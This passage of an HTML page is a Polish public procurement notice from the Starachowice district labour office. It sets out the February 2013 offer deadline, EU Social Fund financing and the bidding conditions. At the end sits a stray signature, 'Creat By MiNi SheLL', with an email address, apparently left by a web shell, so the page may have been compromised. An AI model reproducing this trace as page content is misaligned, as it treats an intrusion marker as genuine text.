          działalności gospodarczej, jeśli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do 
          ewidencji działalności gospodarczej w formie oryginału lub kopii poświadczonej za zgodność 
          z oryginałem.
Nie dostarczenie tych dokumentów będzie skutkowało odstąpieniem przez Zamawiającego od podpisania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-starachowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pup-starachowice.pl  
Zakładka zamówienia publiczne.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2013 godzina 12:00, miejsce: Siedziba Zamawiającego: Powiatowy Urząd Pracy w Starachowicach ul. Radomska 76, w pokoju 210.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> -   Zamawiający nie dopuszcza składania ofert częściowych.
-   Zamawiający nie dopuszcza składania ofert wariantowych.
-   Zamawiający nie przewiduje zamówień uzupełniających.
-   Zamawiający nie przewiduje zawarcia umowy ramowej.
-   Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
-   Zamawiający nie przewiduje zastosowania aukcji elektronicznej.
-   Zamówienie jest finansowane ze środków Unii Europejskiej w ramach projektu: Profesjonalizm    
     naszą dewizą - uśmiech naszą wizytówką współfinansowanego ze środków Europejskiego 
     Funduszu Społecznego, realizowanego z Programu Operacyjnego Kapitał Ludzki - Priorytet VI 
     Rynek pracy otwarty dla wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz 
     wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.2 Wsparcie powiatowych 
     i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji zawodowej osób 
     bezrobotnych w regionie.
-  Otwarcie ofert nastąpi w dniu 27.02.2013 r. o godz. 12:10 w siedzibie Zamawiającego 
w pokoju  nr 208. Otwarcie ofert jest jawne..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com